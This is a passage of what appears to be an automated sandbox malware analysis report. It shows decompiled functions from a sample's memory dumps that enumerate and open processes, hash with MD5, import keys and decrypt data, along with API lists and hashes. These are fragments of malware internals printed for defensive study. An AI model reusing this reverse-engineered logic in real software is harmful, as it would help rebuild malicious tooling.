                                                                                                                                                                                                                                                                                          					goto L18;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_v320 = GetCurrentProcessId();
                                                                                                                                                                                                                                                                                          				_v316 = 0;
                                                                                                                                                                                                                                                                                          				while(_v300 != _v320) {
                                                                                                                                                                                                                                                                                          					if(Process32Next(_v312,  &_v308) != 0) {
                                                                                                                                                                                                                                                                                          						continue;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					L6:
                                                                                                                                                                                                                                                                                          					if(_v316 != 0 && Process32First(_v312,  &_v308) != 0) {
                                                                                                                                                                                                                                                                                          						while(_v300 != _v316) {
                                                                                                                                                                                                                                                                                          							if(Process32Next(_v312,  &_v308) != 0) {
                                                                                                                                                                                                                                                                                          								continue;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							goto L17;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						if(lstrlenA( &_v272) < _a8) {
                                                                                                                                                                                                                                                                                          							lstrcpyA(_a4,  &_v272);
                                                                                                                                                                                                                                                                                          							_v324 = OpenProcess(0x410, 0, _v316);
                                                                                                                                                                                                                                                                                          							if(_v324 != 0) {
                                                                                                                                                                                                                                                                                          								_v332 = 0;
                                                                                                                                                                                                                                                                                          								_push( &_v332);
                                                                                                                                                                                                                                                                                          								_push(4);
                                                                                                                                                                                                                                                                                          								_push( &_v328);
                                                                                                                                                                                                                                                                                          								_t61 = _v324;
                                                                                                                                                                                                                                                                                          								_push(_t61); // executed
                                                                                                                                                                                                                                                                                          								L0400B1D4(); // executed
                                                                                                                                                                                                                                                                                          								if(_t61 == 0) {
                                                                                                                                                                                                                                                                                          									_push(_a8);
                                                                                                                                                                                                                                                                                          									_push(_a4);
                                                                                                                                                                                                                                                                                          									_push(_v324); // executed
                                                                                                                                                                                                                                                                                          									L0400B1C8(); // executed
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									_push(_a8);
                                                                                                                                                                                                                                                                                          									_push(_a4);
                                                                                                                                                                                                                                                                                          									_push(_v328);
                                                                                                                                                                                                                                                                                          									_push(_v324);
                                                                                                                                                                                                                                                                                          									L0400B1CE();
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								_v5 = 1;
                                                                                                                                                                                                                                                                                          								FindCloseChangeNotification(_v324); // executed
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					goto L17;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_v316 = _v284;
                                                                                                                                                                                                                                                                                          				goto L6;
                                                                                                                                                                                                                                                                                          			}

















                                                                                                                                                                                                                                                                                          0x04001ca9
                                                                                                                                                                                                                                                                                          0x04001cb1
                                                                                                                                                                                                                                                                                          0x04001cb6
                                                                                                                                                                                                                                                                                          0x04001cc3
                                                                                                                                                                                                                                                                                          0x04001e51
                                                                                                                                                                                                                                                                                          0x04001e57
                                                                                                                                                                                                                                                                                          0x04001e57
                                                                                                                                                                                                                                                                                          0x04001cc9
                                                                                                                                                                                                                                                                                          0x04001ce1
                                                                                                                                                                                                                                                                                          0x04001ce8
                                                                                                                                                                                                                                                                                          0x04001e44
                                                                                                                                                                                                                                                                                          0x04001e4b
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04001e4b
                                                                                                                                                                                                                                                                                          0x04001cf4
                                                                                                                                                                                                                                                                                          0x04001cfa
                                                                                                                                                                                                                                                                                          0x04001d04
                                                                                                                                                                                                                                                                                          0x04001d35
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04001d37
                                                                                                                                                                                                                                                                                          0x04001d3e
                                                                                                                                                                                                                                                                                          0x04001d5f
                                                                                                                                                                                                                                                                                          0x04001e3e
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04001e3e
                                                                                                                                                                                                                                                                                          0x04001d81
                                                                                                                                                                                                                                                                                          0x04001d92
                                                                                                                                                                                                                                                                                          0x04001dac
                                                                                                                                                                                                                                                                                          0x04001db9
                                                                                                                                                                                                                                                                                          0x04001dbb
                                                                                                                                                                                                                                                                                          0x04001dcb
                                                                                                                                                                                                                                                                                          0x04001dcc
                                                                                                                                                                                                                                                                                          0x04001dd4
                                                                                                                                                                                                                                                                                          0x04001dd5
                                                                                                                                                                                                                                                                                          0x04001ddb
                                                                                                                                                                                                                                                                                          0x04001ddc
                                                                                                                                                                                                                                                                                          0x04001de3
                                                                                                                                                                                                                                                                                          0x04001e05
                                                                                                                                                                                                                                                                                          0x04001e09
                                                                                                                                                                                                                                                                                          0x04001e10
                                                                                                                                                                                                                                                                                          0x04001e11
                                                                                                                                                                                                                                                                                          0x04001de5
                                                                                                                                                                                                                                                                                          0x04001de8
                                                                                                                                                                                                                                                                                          0x04001dec
                                                                                                                                                                                                                                                                                          0x04001df3
                                                                                                                                                                                                                                                                                          0x04001dfa
                                                                                                                                                                                                                                                                                          0x04001dfb
                                                                                                                                                                                                                                                                                          0x04001dfb
                                                                                                                                                                                                                                                                                          0x04001e16
                                                                                                                                                                                                                                                                                          0x04001e21
                                                                                                                                                                                                                                                                                          0x04001e21
                                                                                                                                                                                                                                                                                          0x04001db9
                                                                                                                                                                                                                                                                                          0x04001e27
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04001d3e
                                                                                                                                                                                                                                                                                          0x04001d18
                                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04001CB1
                                                                                                                                                                                                                                                                                          • Process32First.KERNEL32(000000FF,00000128), ref: 04001CE1
                                                                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 04001CEE
                                                                                                                                                                                                                                                                                          • Process32Next.KERNEL32 ref: 04001D2E
                                                                                                                                                                                                                                                                                          • Process32First.KERNEL32(000000FF,00000128), ref: 04001D52
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,000000FF,00000128,000000FF,00000128), ref: 04001D78
                                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(-00000204,?), ref: 04001D92
                                                                                                                                                                                                                                                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 04001DA6
                                                                                                                                                                                                                                                                                          • EnumProcessModules.PSAPI(00000000,?,00000004,00000000), ref: 04001DDC
                                                                                                                                                                                                                                                                                          • GetModuleFileNameExA.PSAPI(00000000,?,-00000204,0400575B,00000000,?,00000004,00000000), ref: 04001DFB
                                                                                                                                                                                                                                                                                          • GetProcessImageFileNameA.PSAPI(00000000,-00000204,0400575B,00000000,?,00000004,00000000), ref: 04001E11
                                                                                                                                                                                                                                                                                          • FindCloseChangeNotification.KERNEL32(00000000,00000000,-00000204,0400575B,00000000,?,00000004,00000000), ref: 04001E21
                                                                                                                                                                                                                                                                                          • Process32Next.KERNEL32 ref: 04001E37
                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(000000FF), ref: 04001E4B
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.730634851.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730592213.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730732791.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730766607.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ProcessProcess32$CloseFileFirstNameNext$ChangeCreateCurrentEnumFindHandleImageModuleModulesNotificationOpenSnapshotToolhelp32lstrcpylstrlen
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 384183238-0
                                                                                                                                                                                                                                                                                          • Opcode ID: f968c283a4d19645c33466bb1cdde0a0755c48e1b5ee604f6c84b8f5c7af64fd
                                                                                                                                                                                                                                                                                          • Instruction ID: c9fd9719e36fb5edb768dae97ebace1d15885c7ece39cbb3db7519296d7591e9
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f968c283a4d19645c33466bb1cdde0a0755c48e1b5ee604f6c84b8f5c7af64fd
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9641DC719002189BEB65DF94CD84BEDB7B9AB48304F0086D8E60DB6180DB75BE84CF50
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 783 4008bb0-4008bc1 784 4008ce7-4008ced 783->784 785 4008bc7-4008bcb 783->785 785->784 786 4008bd1-4008bd5 785->786 786->784 787 4008bdb-4008bdf 786->787 787->784 788 4008be5-4008c07 CryptAcquireContextA 787->788 789 4008c09-4008c19 GetLastError 788->789 790 4008c3e-4008c42 788->790 791 4008c24-4008c38 CryptAcquireContextA 789->791 792 4008c1b-4008c22 789->792 790->784 793 4008c48-4008c61 CryptCreateHash 790->793 791->790 792->790 792->791 794 4008c63-4008c79 CryptHashData 793->794 795 4008cdb-4008ce1 CryptReleaseContext 793->795 796 4008cd1-4008cd5 CryptDestroyHash 794->796 797 4008c7b-4008ca1 CryptGetHashParam 794->797 795->784 796->795 797->796 798 4008ca3-4008ca9 797->798 798->796 799 4008cab-4008cc9 CryptGetHashParam 798->799 799->796 800 4008ccb-4008cce 799->800 800->796
                                                                                                                                                                                                                                                                                          C-Code - Quality: 30%
                                                                                                                                                                                                                                                                                          			E04008BB0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
                                                                                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                                                                                          				long* _v12;
                                                                                                                                                                                                                                                                                          				int _v16;
                                                                                                                                                                                                                                                                                          				char _v20;
                                                                                                                                                                                                                                                                                          				int _v24;
                                                                                                                                                                                                                                                                                          				char _v28;
                                                                                                                                                                                                                                                                                          				int _v32;
                                                                                                                                                                                                                                                                                          				char* _t36;
                                                                                                                                                                                                                                                                                          				int _t37;
                                                                                                                                                                                                                                                                                          				intOrPtr _t39;
                                                                                                                                                                                                                                                                                          				char* _t41;
                                                                                                                                                                                                                                                                                          				intOrPtr _t43;
                                                                                                                                                                                                                                                                                          				char* _t57;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0) {
                                                                                                                                                                                                                                                                                          					L17:
                                                                                                                                                                                                                                                                                          					return _v8;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_v12 = 0;
                                                                                                                                                                                                                                                                                          					_t36 =  *0x4013370; // 0x400c6e4
                                                                                                                                                                                                                                                                                          					_t37 = CryptAcquireContextA( &_v12, _t36, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0); // executed
                                                                                                                                                                                                                                                                                          					if(_t37 == 0) {
                                                                                                                                                                                                                                                                                          						_t37 = GetLastError();
                                                                                                                                                                                                                                                                                          						_v16 = _t37;
                                                                                                                                                                                                                                                                                          						if(_v16 == 0x80090016 || _v16 == 0x8009000b) {
                                                                                                                                                                                                                                                                                          							_t57 =  *0x4013370; // 0x400c6e4
                                                                                                                                                                                                                                                                                          							_t37 = CryptAcquireContextA( &_v12, _t57, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8); // executed
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					if(_v12 != 0) {
                                                                                                                                                                                                                                                                                          						__imp__CryptCreateHash(_v12, 0x8003, 0, 0,  &_v20);
                                                                                                                                                                                                                                                                                          						if(_t37 != 0) {
                                                                                                                                                                                                                                                                                          							_t39 = _a8;
                                                                                                                                                                                                                                                                                          							__imp__CryptHashData(_v20, _a4, _t39, 0);
                                                                                                                                                                                                                                                                                          							if(_t39 != 0) {
                                                                                                                                                                                                                                                                                          								_v24 = 0;
                                                                                                                                                                                                                                                                                          								_v28 = 4;
                                                                                                                                                                                                                                                                                          								_t41 =  &_v28;
                                                                                                                                                                                                                                                                                          								__imp__CryptGetHashParam(_v20, 4,  &_v24, _t41, 0);
                                                                                                                                                                                                                                                                                          								if(_t41 != 0 && _a16 >= _v24) {
                                                                                                                                                                                                                                                                                          									_v32 = _a16;
                                                                                                                                                                                                                                                                                          									_t43 = _a12;
                                                                                                                                                                                                                                                                                          									__imp__CryptGetHashParam(_v20, 2, _t43,  &_v32, 0);
                                                                                                                                                                                                                                                                                          									if(_t43 != 0) {
                                                                                                                                                                                                                                                                                          										_v8 = _v32;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							__imp__CryptDestroyHash(_v20);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						CryptReleaseContext(_v12, 0);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					goto L17;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}
















                                                                                                                                                                                                                                                                                          0x04008bb6
                                                                                                                                                                                                                                                                                          0x04008bc1
                                                                                                                                                                                                                                                                                          0x04008ce7
                                                                                                                                                                                                                                                                                          0x04008ced
                                                                                                                                                                                                                                                                                          0x04008be5
                                                                                                                                                                                                                                                                                          0x04008be5
                                                                                                                                                                                                                                                                                          0x04008bf5
                                                                                                                                                                                                                                                                                          0x04008bff
                                                                                                                                                                                                                                                                                          0x04008c07
                                                                                                                                                                                                                                                                                          0x04008c09
                                                                                                                                                                                                                                                                                          0x04008c0f
                                                                                                                                                                                                                                                                                          0x04008c19
                                                                                                                                                                                                                                                                                          0x04008c2d
                                                                                                                                                                                                                                                                                          0x04008c38
                                                                                                                                                                                                                                                                                          0x04008c38
                                                                                                                                                                                                                                                                                          0x04008c19
                                                                                                                                                                                                                                                                                          0x04008c42
                                                                                                                                                                                                                                                                                          0x04008c59
                                                                                                                                                                                                                                                                                          0x04008c61
                                                                                                                                                                                                                                                                                          0x04008c65
                                                                                                                                                                                                                                                                                          0x04008c71
                                                                                                                                                                                                                                                                                          0x04008c79
                                                                                                                                                                                                                                                                                          0x04008c7b
                                                                                                                                                                                                                                                                                          0x04008c82
                                                                                                                                                                                                                                                                                          0x04008c8b
                                                                                                                                                                                                                                                                                          0x04008c99
                                                                                                                                                                                                                                                                                          0x04008ca1
                                                                                                                                                                                                                                                                                          0x04008cae
                                                                                                                                                                                                                                                                                          0x04008cb7
                                                                                                                                                                                                                                                                                          0x04008cc1
                                                                                                                                                                                                                                                                                          0x04008cc9
                                                                                                                                                                                                                                                                                          0x04008cce
                                                                                                                                                                                                                                                                                          0x04008cce
                                                                                                                                                                                                                                                                                          0x04008cc9
                                                                                                                                                                                                                                                                                          0x04008ca1
                                                                                                                                                                                                                                                                                          0x04008cd5
                                                                                                                                                                                                                                                                                          0x04008cd5
                                                                                                                                                                                                                                                                                          0x04008ce1
                                                                                                                                                                                                                                                                                          0x04008ce1
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04008c42

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 04008BFF
                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 04008C09
                                                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04008C38
                                                                                                                                                                                                                                                                                          • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 04008C59
                                                                                                                                                                                                                                                                                          • CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 04008C71
                                                                                                                                                                                                                                                                                          • CryptGetHashParam.ADVAPI32(00000000,00000004,00000000,00000004,00000000), ref: 04008C99
                                                                                                                                                                                                                                                                                          • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 04008CC1
                                                                                                                                                                                                                                                                                          • CryptDestroyHash.ADVAPI32(00000000), ref: 04008CD5
                                                                                                                                                                                                                                                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04008CE1
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 04008C28
                                                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 04008BF0
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.730634851.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730592213.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730732791.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730766607.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Crypt$Hash$Context$AcquireParam$CreateDataDestroyErrorLastRelease
                                                                                                                                                                                                                                                                                          • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                                                                                                                          • API String ID: 731959895-947817771
                                                                                                                                                                                                                                                                                          • Opcode ID: c04671c4f16af3ba3265102b35b0728ece87a0365c7276e8c5171731790e3264
                                                                                                                                                                                                                                                                                          • Instruction ID: 7e4f484856ccd150e5ceb993e2d8e8a423e5286abb412a2c571c9cca470c08b6
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c04671c4f16af3ba3265102b35b0728ece87a0365c7276e8c5171731790e3264
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4E41C772A50209ABEB14DF94C849FAFB7B9FB44705F14C529A601B61C0D7B8AA84CB60
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E04008A70(BYTE* _a4, DWORD* _a8, BYTE* _a12, int _a16, BYTE* _a20, int _a24) {
                                                                                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                                                                                          				long* _v12;
                                                                                                                                                                                                                                                                                          				long _v16;
                                                                                                                                                                                                                                                                                          				long* _v20;
                                                                                                                                                                                                                                                                                          				long* _v24;
                                                                                                                                                                                                                                                                                          				char* _t35;
                                                                                                                                                                                                                                                                                          				int _t36;
                                                                                                                                                                                                                                                                                          				int _t38;
                                                                                                                                                                                                                                                                                          				char* _t62;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0 || _a20 == 0 || _a24 == 0) {
                                                                                                                                                                                                                                                                                          					L16:
                                                                                                                                                                                                                                                                                          					return _v8;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_v12 = 0;
                                                                                                                                                                                                                                                                                          					_t35 =  *0x4013370; // 0x400c6e4
                                                                                                                                                                                                                                                                                          					_t36 = CryptAcquireContextA( &_v12, _t35, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0); // executed
                                                                                                                                                                                                                                                                                          					if(_t36 == 0) {
                                                                                                                                                                                                                                                                                          						_v16 = GetLastError();
                                                                                                                                                                                                                                                                                          						if(_v16 == 0x80090016 || _v16 == 0x8009000b) {
                                                                                                                                                                                                                                                                                          							_t62 =  *0x4013370; // 0x400c6e4
                                                                                                                                                                                                                                                                                          							CryptAcquireContextA( &_v12, _t62, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					if(_v12 != 0) {
                                                                                                                                                                                                                                                                                          						_v20 = 0;
                                                                                                                                                                                                                                                                                          						_t38 = CryptImportKey(_v12, _a20, _a24, 0, 1,  &_v20); // executed
                                                                                                                                                                                                                                                                                          						if(_t38 != 0) {
                                                                                                                                                                                                                                                                                          							_v24 = 0;
                                                                                                                                                                                                                                                                                          							if(CryptImportKey(_v12, _a12, _a16, _v20, 1,  &_v24) != 0) {
                                                                                                                                                                                                                                                                                          								_v8 = CryptDecrypt(_v24, 0, 1, 0, _a4, _a8);
                                                                                                                                                                                                                                                                                          								CryptDestroyKey(_v24);
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							CryptDestroyKey(_v20);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						CryptReleaseContext(_v12, 0);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					goto L16;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}












                                                                                                                                                                                                                                                                                          0x04008a76
                                                                                                                                                                                                                                                                                          0x04008a81
                                                                                                                                                                                                                                                                                          0x04008ba3
                                                                                                                                                                                                                                                                                          0x04008ba9
                                                                                                                                                                                                                                                                                          0x04008ab9
                                                                                                                                                                                                                                                                                          0x04008ab9
                                                                                                                                                                                                                                                                                          0x04008ac9
                                                                                                                                                                                                                                                                                          0x04008ad3
                                                                                                                                                                                                                                                                                          0x04008adb
                                                                                                                                                                                                                                                                                          0x04008ae3
                                                                                                                                                                                                                                                                                          0x04008aed
                                                                                                                                                                                                                                                                                          0x04008b01
                                                                                                                                                                                                                                                                                          0x04008b0c
                                                                                                                                                                                                                                                                                          0x04008b0c
                                                                                                                                                                                                                                                                                          0x04008aed
                                                                                                                                                                                                                                                                                          0x04008b16
                                                                                                                                                                                                                                                                                          0x04008b1c
                                                                                                                                                                                                                                                                                          0x04008b37
                                                                                                                                                                                                                                                                                          0x04008b3f
                                                                                                                                                                                                                                                                                          0x04008b41
                                                                                                                                                                                                                                                                                          0x04008b66
                                                                                                                                                                                                                                                                                          0x04008b80
                                                                                                                                                                                                                                                                                          0x04008b87
                                                                                                                                                                                                                                                                                          0x04008b87
                                                                                                                                                                                                                                                                                          0x04008b91
                                                                                                                                                                                                                                                                                          0x04008b91
                                                                                                                                                                                                                                                                                          0x04008b9d
                                                                                                                                                                                                                                                                                          0x04008b9d
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04008b16

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 04008AD3
                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 04008ADD
                                                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04008B0C
                                                                                                                                                                                                                                                                                          • CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,00000000), ref: 04008B37
                                                                                                                                                                                                                                                                                          • CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 04008B5E
                                                                                                                                                                                                                                                                                          • CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000), ref: 04008B7A
                                                                                                                                                                                                                                                                                          • CryptDestroyKey.ADVAPI32(00000000), ref: 04008B87
                                                                                                                                                                                                                                                                                          • CryptDestroyKey.ADVAPI32(00000000), ref: 04008B91
                                                                                                                                                                                                                                                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04008B9D
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 04008AC4
                                                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 04008AFC
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.730634851.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730592213.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730732791.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730766607.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Crypt$Context$AcquireDestroyImport$DecryptErrorLastRelease
                                                                                                                                                                                                                                                                                          • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                                                                                                                          • API String ID: 1555285084-947817771
                                                                                                                                                                                                                                                                                          • Opcode ID: a29918078d8c2f64865fcd98cb153a1075290469360e4a9c607703ac9d42e64f
                                                                                                                                                                                                                                                                                          • Instruction ID: 912f8c379191964defa89f3bac9fc05279983c51f6e5ced775be03f2308b6df6
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a29918078d8c2f64865fcd98cb153a1075290469360e4a9c607703ac9d42e64f
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5A31CDB5A04209EBFB58DF94D849BEE77B8FB48705F14C518F601B62C0C7B8A984CB61
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(02554054,02554040), ref: 02551047
                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0255104E
                                                                                                                                                                                                                                                                                            • Part of subcall function 02551B30: SetLastError.KERNEL32(0000000D,?,02551070,?,00000040), ref: 02551B3D
                                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(000000C1), ref: 02551096
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.719923860.0000000002551000.00000020.00001000.00020000.00000000.sdmp, Offset: 02551000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2551000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ErrorLast$AddressLibraryLoadProc
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1866314245-0
                                                                                                                                                                                                                                                                                          • Opcode ID: fcc211d60620bdd8846dea480124f33310f24d68394209e930c225647411e923
                                                                                                                                                                                                                                                                                          • Instruction ID: 99709bc8733b1d85a86417b94c96a55c7f83243b73b7646e765d19b10c8f1f0a
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fcc211d60620bdd8846dea480124f33310f24d68394209e930c225647411e923
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 72F1EAB4E00619EFDB04CF94D9A4BAEBBB1BF48304F108599E909AB351D735EA41CF94
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 040048EB
                                                                                                                                                                                                                                                                                          • CryptHashData.ADVAPI32(00000000,?,00000010,00000000), ref: 0400490B
                                                                                                                                                                                                                                                                                          • CryptDeriveKey.ADVAPI32(00000000,00006801,00000000,00000001,00000000), ref: 0400493C
                                                                                                                                                                                                                                                                                          • CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,?,000002F0), ref: 0400496F
                                                                                                                                                                                                                                                                                          • CryptDestroyKey.ADVAPI32(00000000), ref: 04004982
                                                                                                                                                                                                                                                                                          • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,?), ref: 040049A9
